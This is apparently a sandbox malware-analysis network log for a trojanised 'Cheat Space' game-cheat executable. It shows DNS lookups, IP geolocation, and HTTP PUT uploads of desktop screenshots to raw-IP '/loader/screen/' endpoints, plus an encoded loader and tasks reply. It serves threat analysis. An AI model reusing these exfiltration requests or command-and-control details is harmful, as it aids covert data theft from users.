Dec 3, 2023 17:23:17.003783941 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:17.003812075 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:17.003865957 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:17.003976107 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:17.004085064 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:17.004092932 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:17.004139900 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:17.004261017 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:17.213254929 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:17.213421106 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:17.641268969 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:17.641520023 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:18.196466923 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:18.196501017 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:18.196541071 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:18.196625948 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:18.196635962 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:18.196657896 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:18.196671009 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:18.196708918 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:18.196717024 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:18.196732998 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:18.196759939 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:18.196765900 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:18.196777105 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:18.196810961 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:18.196818113 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:18.196835995 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:18.196840048 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:18.196858883 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:18.196863890 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:18.196877003 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:18.197011948 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:18.197017908 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:18.197048903 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:18.197089911 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:18.197204113 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:18.197252989 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:23.103666067 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:24.459206104 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:26.189685106 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:26.189758062 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:59.250736952 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:23:59.251449108 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:24:05.579576015 CET	49738	80	192.168.2.4	162.159.130.233
Dec 3, 2023 17:24:05.579576015 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:24:05.603069067 CET	49741	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:24:05.708400965 CET	80	49738	162.159.130.233	192.168.2.4
Dec 3, 2023 17:24:05.708533049 CET	49738	80	192.168.2.4	162.159.130.233
Dec 3, 2023 17:24:05.814001083 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:24:05.837553978 CET	80	49741	80.66.89.151	192.168.2.4
Dec 3, 2023 17:24:05.837646961 CET	49741	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:24:05.837959051 CET	49741	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:24:06.025006056 CET	49742	80	192.168.2.4	172.67.136.249
Dec 3, 2023 17:24:06.072333097 CET	80	49741	80.66.89.151	192.168.2.4
Dec 3, 2023 17:24:06.154783964 CET	80	49742	172.67.136.249	192.168.2.4
Dec 3, 2023 17:24:06.154898882 CET	49742	80	192.168.2.4	172.67.136.249
Dec 3, 2023 17:24:06.155225992 CET	49742	80	192.168.2.4	172.67.136.249
Dec 3, 2023 17:24:06.155261040 CET	49742	80	192.168.2.4	172.67.136.249
Dec 3, 2023 17:24:06.284902096 CET	80	49742	172.67.136.249	192.168.2.4
Dec 3, 2023 17:24:06.284930944 CET	80	49742	172.67.136.249	192.168.2.4
Dec 3, 2023 17:24:06.303754091 CET	80	49741	80.66.89.151	192.168.2.4
Dec 3, 2023 17:24:06.303891897 CET	49741	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:24:06.375971079 CET	49741	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:24:06.677180052 CET	80	49742	172.67.136.249	192.168.2.4
Dec 3, 2023 17:24:06.677216053 CET	80	49742	172.67.136.249	192.168.2.4
Dec 3, 2023 17:24:06.677227974 CET	80	49742	172.67.136.249	192.168.2.4
Dec 3, 2023 17:24:06.677529097 CET	49742	80	192.168.2.4	172.67.136.249
Dec 3, 2023 17:24:06.824429989 CET	49743	80	192.168.2.4	172.67.154.200
Dec 3, 2023 17:24:06.953125954 CET	80	49743	172.67.154.200	192.168.2.4
Dec 3, 2023 17:24:06.953254938 CET	49743	80	192.168.2.4	172.67.154.200
Dec 3, 2023 17:24:06.953691006 CET	49743	80	192.168.2.4	172.67.154.200
Dec 3, 2023 17:24:06.953735113 CET	49743	80	192.168.2.4	172.67.154.200
Dec 3, 2023 17:24:07.082369089 CET	80	49743	172.67.154.200	192.168.2.4
Dec 3, 2023 17:24:07.082390070 CET	80	49743	172.67.154.200	192.168.2.4
Dec 3, 2023 17:24:07.096159935 CET	80	49743	172.67.154.200	192.168.2.4
Dec 3, 2023 17:24:07.096174955 CET	80	49743	172.67.154.200	192.168.2.4
Dec 3, 2023 17:24:07.096185923 CET	80	49743	172.67.154.200	192.168.2.4
Dec 3, 2023 17:24:07.096225977 CET	80	49743	172.67.154.200	192.168.2.4
Dec 3, 2023 17:24:07.096239090 CET	80	49743	172.67.154.200	192.168.2.4
Dec 3, 2023 17:24:07.096250057 CET	80	49743	172.67.154.200	192.168.2.4
Dec 3, 2023 17:24:07.096251011 CET	49743	80	192.168.2.4	172.67.154.200
Dec 3, 2023 17:24:07.096352100 CET	49743	80	192.168.2.4	172.67.154.200
Dec 3, 2023 17:24:07.096352100 CET	49743	80	192.168.2.4	172.67.154.200
Dec 3, 2023 17:24:07.126616001 CET	49743	80	192.168.2.4	172.67.154.200
Dec 3, 2023 17:24:07.126652956 CET	49743	80	192.168.2.4	172.67.154.200
Dec 3, 2023 17:24:07.255847931 CET	80	49743	172.67.154.200	192.168.2.4
Dec 3, 2023 17:24:07.586757898 CET	80	49743	172.67.154.200	192.168.2.4
Dec 3, 2023 17:24:07.586781025 CET	80	49743	172.67.154.200	192.168.2.4
Dec 3, 2023 17:24:07.586795092 CET	80	49743	172.67.154.200	192.168.2.4
Dec 3, 2023 17:24:07.587002993 CET	49743	80	192.168.2.4	172.67.154.200
Dec 3, 2023 17:24:07.635978937 CET	49743	80	192.168.2.4	172.67.154.200
Dec 3, 2023 17:24:09.893771887 CET	49742	80	192.168.2.4	172.67.136.249
Dec 3, 2023 17:24:09.893846989 CET	49743	80	192.168.2.4	172.67.154.200

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 3, 2023 17:22:15.577881098 CET	65516	53	192.168.2.4	1.1.1.1
Dec 3, 2023 17:22:15.707676888 CET	53	65516	1.1.1.1	192.168.2.4
Dec 3, 2023 17:22:54.369199991 CET	60793	53	192.168.2.4	1.1.1.1
Dec 3, 2023 17:22:54.499316931 CET	53	60793	1.1.1.1	192.168.2.4
Dec 3, 2023 17:24:05.579451084 CET	50752	53	192.168.2.4	1.1.1.1
Dec 3, 2023 17:24:06.015145063 CET	53	50752	1.1.1.1	192.168.2.4
Dec 3, 2023 17:24:06.683410883 CET	49677	53	192.168.2.4	1.1.1.1
Dec 3, 2023 17:24:06.820738077 CET	53	49677	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 3, 2023 17:22:15.577881098 CET	192.168.2.4	1.1.1.1	0xc0aa	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Dec 3, 2023 17:22:54.369199991 CET	192.168.2.4	1.1.1.1	0x98ff	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)	false
Dec 3, 2023 17:24:05.579451084 CET	192.168.2.4	1.1.1.1	0x3daa	Standard query (0)	pokarisers.pw	A (IP address)	IN (0x0001)	false
Dec 3, 2023 17:24:06.683410883 CET	192.168.2.4	1.1.1.1	0x16df	Standard query (0)	tirechinecarpett.pw	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 3, 2023 17:22:15.707676888 CET	1.1.1.1	192.168.2.4	0xc0aa	No error (0)	ip-api.com	208.95.112.1	A (IP address)	IN (0x0001)	false
Dec 3, 2023 17:22:54.499316931 CET	1.1.1.1	192.168.2.4	0x98ff	No error (0)	cdn.discordapp.com	162.159.130.233	A (IP address)	IN (0x0001)	false
Dec 3, 2023 17:22:54.499316931 CET	1.1.1.1	192.168.2.4	0x98ff	No error (0)	cdn.discordapp.com	162.159.129.233	A (IP address)	IN (0x0001)	false
Dec 3, 2023 17:22:54.499316931 CET	1.1.1.1	192.168.2.4	0x98ff	No error (0)	cdn.discordapp.com	162.159.133.233	A (IP address)	IN (0x0001)	false
Dec 3, 2023 17:22:54.499316931 CET	1.1.1.1	192.168.2.4	0x98ff	No error (0)	cdn.discordapp.com	162.159.135.233	A (IP address)	IN (0x0001)	false
Dec 3, 2023 17:22:54.499316931 CET	1.1.1.1	192.168.2.4	0x98ff	No error (0)	cdn.discordapp.com	162.159.134.233	A (IP address)	IN (0x0001)	false
Dec 3, 2023 17:24:06.015145063 CET	1.1.1.1	192.168.2.4	0x3daa	No error (0)	pokarisers.pw	172.67.136.249	A (IP address)	IN (0x0001)	false
Dec 3, 2023 17:24:06.015145063 CET	1.1.1.1	192.168.2.4	0x3daa	No error (0)	pokarisers.pw	104.21.89.35	A (IP address)	IN (0x0001)	false
Dec 3, 2023 17:24:06.820738077 CET	1.1.1.1	192.168.2.4	0x16df	No error (0)	tirechinecarpett.pw	172.67.154.200	A (IP address)	IN (0x0001)	false
Dec 3, 2023 17:24:06.820738077 CET	1.1.1.1	192.168.2.4	0x16df	No error (0)	tirechinecarpett.pw	104.21.13.53	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

cdn.discordapp.com

ip-api.com

pokarisers.pw

tirechinecarpett.pw

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49729	208.95.112.1	80	8024	C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 3, 2023 17:22:15.858342886 CET	216	OUT	GET /json/?fields=query,status,countryCode,city,timezone HTTP/1.1 Content-Type: application/json User-Agent: Tree Host: ip-api.com Cache-Control: no-cache
Dec 3, 2023 17:22:16.004404068 CET	347	IN	HTTP/1.1 200 OK Date: Sun, 03 Dec 2023 16:22:15 GMT Content-Type: application/json; charset=utf-8 Content-Length: 116 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 63 69 74 79 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 20 44 63 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 71 75 65 72 79 22 3a 22 31 34 39 2e 31 38 2e 32 34 2e 31 31 30 22 7d Data Ascii: {"status":"success","countryCode":"US","city":"Washington Dc","timezone":"America/New_York","query":"149.18.24.110"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	213.248.43.99	80	8024	C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 3, 2023 17:22:17.118556976 CET	286	OUT	PUT /loader/screen/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms HTTP/1.1 Content-Type: multipart/form-data; boundary=aR7xY3qP2sL8mV1nH0oB9zD4A User-Agent: Tree Host: 213.248.43.99 Content-Length: 3933208 Cache-Control: no-cache
Dec 3, 2023 17:22:17.119869947 CET	11628	OUT	Data Raw: 2d 2d 61 52 37 78 59 33 71 50 32 73 4c 38 6d 56 31 6e 48 30 6f 42 39 7a 44 34 41 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f Data Ascii: --aR7xY3qP2sL8mV1nH0oB9zD4AContent-Type: application/octet-streamContent-Disposition: form-data; name="file"; filename="screen.bmp"BM6($$######$$$$$$$$#
Dec 3, 2023 17:22:17.338247061 CET	1340	OUT	Data Raw: 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 Data Ascii: vlg$$#################################
Dec 3, 2023 17:22:17.339096069 CET	2626	OUT	Data Raw: 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 Data Ascii: ###########################""""""""""""""""""""""#####################"""###"""""
Dec 3, 2023 17:22:17.339428902 CET	2626	OUT	Data Raw: 01 1c 0b 01 1c 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1c 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0a 00 1b 0a 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 Data Ascii: vlg$$#######################################
Dec 3, 2023 17:22:17.339704990 CET	1340	OUT	Data Raw: 20 12 00 20 12 00 20 12 00 20 12 00 20 12 00 20 12 00 20 12 00 20 12 00 20 12 00 20 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f Data Ascii:
Dec 3, 2023 17:22:17.339975119 CET	1340	OUT	Data Raw: 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 01 1b 0b 00 1b 0a 00 1b 0a 00 1b 0b 01 Data Ascii: vmg$$#############################################
Dec 3, 2023 17:22:17.340078115 CET	1340	OUT	Data Raw: 20 13 00 20 13 00 20 13 00 20 13 00 20 13 00 20 13 00 20 13 00 20 13 00 20 13 00 20 13 00 20 13 00 1f 13 00 1f 13 00 1f 13 00 1f 13 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 20 13 00 1f 12 00 1f 12 00 20 12 00 20 12 00 20 12 00 20 12 00 20 Data Ascii:
Dec 3, 2023 17:22:17.340711117 CET	1340	OUT	Data Raw: 01 1b 0b 00 1b 0b 00 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1c 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1c 0b 01 Data Ascii: vmg$$######$$$$$$$$#######
Dec 3, 2023 17:22:17.340827942 CET	1340	OUT	Data Raw: 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 Data Ascii: ###############""""""""""""""""""""""#####################"""###"""""""""""""""""
Dec 3, 2023 17:22:17.558018923 CET	1340	OUT	Data Raw: 20 12 00 20 12 00 20 12 00 20 12 00 20 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49737	80.66.89.151	80	8024	C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 3, 2023 17:22:49.406414032 CET	285	OUT	PUT /loader/screen/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms HTTP/1.1 Content-Type: multipart/form-data; boundary=aR7xY3qP2sL8mV1nH0oB9zD4A User-Agent: Tree Host: 80.66.89.151 Content-Length: 3933208 Cache-Control: no-cache
Dec 3, 2023 17:22:49.407421112 CET	11628	OUT	Data Raw: 2d 2d 61 52 37 78 59 33 71 50 32 73 4c 38 6d 56 31 6e 48 30 6f 42 39 7a 44 34 41 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f Data Ascii: --aR7xY3qP2sL8mV1nH0oB9zD4AContent-Type: application/octet-streamContent-Disposition: form-data; name="file"; filename="screen.bmp"BM6($$######$$$$$$$$#
Dec 3, 2023 17:22:49.641006947 CET	1340	OUT	Data Raw: 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 Data Ascii: vlg$$#################################
Dec 3, 2023 17:22:49.643110037 CET	10342	OUT	Data Raw: 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 Data Ascii: ###########################""""""""""""""""""""""#####################"""###"""""
Dec 3, 2023 17:22:49.644224882 CET	12914	OUT	Data Raw: 01 1b 0b 00 1b 0a 00 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1a 0a 00 1b 0a 01 1b 0a 00 1b 0a 01 76 6d 67 1b 0b 01 1b 0b 01 1b 0b 01 Data Ascii: vmg$$######$$$$$$$$################################
Dec 3, 2023 17:22:49.877281904 CET	2626	OUT	Data Raw: 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 Data Ascii: """""""""""""#####################"""""""""""""""""""""""""""""""""""""""""""""""
Dec 3, 2023 17:22:49.877557039 CET	2626	OUT	Data Raw: 67 1b 0a 01 1b 0a 01 1b 0a 01 1b 0a 01 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 24 1a 00 24 1a 00 24 1a 00 Data Ascii: g$$$$$$$$$$$$$#######$$$$$$$$$$$$$$$$$$$$$$##$$$#
Dec 3, 2023 17:22:49.877635956 CET	5198	OUT	Data Raw: 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 11 00 1f 11 00 1f 11 00 1f 11 00 1f 11 00 1f 11 00 1f 11 00 1f 11 00 1f 11 00 1f 11 00 1f Data Ascii:
Dec 3, 2023 17:22:49.877775908 CET	12914	OUT	Data Raw: 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 3f 37 20 5b 53 40 76 70 60 92 8d 80 ba b7 af c8 c6 bf ff ff ff ff ff ff 24 1a 00 24 1a 00 24 1a 00 Data Ascii: $$$$$######$$$$$?7 [S@vp`$$$$$$$$$$##$$$#///
Dec 3, 2023 17:22:49.878619909 CET	2626	OUT	Data Raw: 96 3a dc 96 3a 77 ab a7 77 ad aa 78 ae ab 78 ae ab 77 ac a9 76 ab a7 dc 96 3a dc 96 3a dc 96 3a b7 a0 65 49 c2 ee 4c cb f8 4e cf fe 31 55 55 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 17 00 22 17 Data Ascii: ::wwxxwv:::eILN1UU"""""""""""""""""""""""""")0B"F&F'F'F&G'nU9!%""""""""""""""""
Dec 3, 2023 17:22:49.878685951 CET	5198	OUT	Data Raw: ff 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii: $$$$$$$$$$$$$$$$+uu+R+uu+R+uu+uu++R+
Dec 3, 2023 17:22:54.185440063 CET	1340	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 03 Dec 2023 16:22:54 GMT Content-Type: application/json Content-Length: 1988 Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UNfkELALwfoGjrIxrJr4GbI5aM%2Bf0eCXg%2FIIfUyCLf%2Bje3QIsNnGj6tdg3jeEVIu3otT%2FUnYyPU8E%2F1zsozCTMGI%2Fw6khVBnXFJawCg4i2jOhtUnyGyV%2Fv8mV1wmZsY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} CF-RAY: 82fd26a4e8e902b9-CDG alt-svc: h3=":443"; ma=86400 Data Raw: 7b 22 6c 6f 61 64 65 72 22 3a 22 59 6a 4d 73 4e 57 49 73 5a 44 49 73 59 6d 4d 73 59 6d 59 73 4f 54 49 73 59 7a 45 73 5a 47 59 73 59 57 49 73 59 6a 59 73 5a 44 41 73 59 6d 45 73 59 6d 59 73 5a 44 55 73 59 7a 59 73 4f 57 51 73 59 6a 59 73 4f 54 59 73 4f 54 51 73 4f 47 51 73 4e 32 49 73 59 54 4d 73 4e 6a 4d 73 4e 54 59 73 4f 54 4d 73 59 6a 59 73 59 7a 55 73 5a 44 49 73 59 7a 63 73 5a 47 45 73 59 7a 59 73 4e 6a 67 73 4e 7a 49 73 4e 54 6b 73 59 54 45 73 4e 6d 59 73 4e 6d 59 73 4e 54 4d 73 59 7a 41 73 5a 44 45 73 59 6a 67 73 59 6a 4d 73 5a 54 41 73 59 7a 49 73 59 6d 51 73 59 32 59 73 4f 44 51 73 4e 7a 49 73 4e 6a 51 73 5a 57 59 73 4e 32 4d 73 5a 54 45 73 59 6a 51 73 5a 54 51 73 59 54 67 73 4e 54 59 73 4e 6d 4d 73 4e 6a 45 73 4e 32 55 73 4f 54 51 73 4f 44 45 73 4f 44 55 73 4e 32 45 73 59 6a 6b 73 59 57 4d 73 4f 57 45 73 5a 54 51 73 59 6a 67 73 59 7a 49 73 4e 54 4d 73 4f 44 67 73 4f 47 4d 73 59 6a 49 73 59 6a 4d 73 5a 44 63 73 59 7a 63 73 59 6d 59 73 5a 54 51 73 4f 47 55 73 4e 54 67 73 4e 6a 59 73 5a 54 67 73 59 6d 49 73 59 32 59 73 59 6a 63 73 5a 47 4d 73 59 6a 63 73 4e 54 59 73 4e 6d 4d 73 4e 6a 45 73 59 32 4d 73 4f 44 55 73 59 7a 6b 73 59 32 45 73 5a 44 41 73 59 6d 45 73 4e 57 45 73 4e 7a 4d 73 4f 54 41 73 4e 6a 55 73 4f 54 41 73 4f 57 59 73 4e 6d 55 73 5a 44 45 73 59 6d 55 73 59 7a 51 73 5a 47 45 73 59 7a 59 73 4e 32 45 73 5a 44 59 73 59 7a 55 73 4f 57 49 73 59 6a 6b 73 5a 54 59 73 59 32 4d 73 5a 44 49 73 59 57 59 73 4f 54 6b 73 4e 6d 59 73 4e 54 51 73 4e 54 51 73 59 6a 51 73 59 7a 55 73 59 7a 51 73 59 7a 6b 73 5a 47 45 73 59 32 49 73 4e 6a 67 73 4e 7a 49 73 4e 54 6b 73 5a 44 59 73 59 54 51 73 59 6d 49 73 59 54 51 73 59 6a 4d 73 5a 54 6b 73 4e 7a 67 73 4e 7a 49 73 4f 47 51 73 59 6d 4d 73 59 7a 4d 73 59 32 49 73 59 7a 63 73 4e 57 45 73 4e 32 55 73 4f 54 51 73 4f 47 45 73 4f 54 6b 73 4e 6d 49 73 4f 54 6b 73 59 6a 4d 73 4f 54 6b 73 59 54 51 73 59 6a 51 73 59 6d 45 73 5a 44 59 73 59 7a 6b 73 59 32 45 73 59 7a 59 73 59 54 6b 73 4f 57 51 73 4e 57 49 73 59 57 45 73 4e 6a 4d 73 4f 44 41 73 59 57 55 73 22 2c 22 74 61 73 6b 73 22 3a 22 4f 54 4d 73 59 6a 51 73 4f 54 49 73 59 57 4d 73 59 6a 4d 73 Data Ascii: 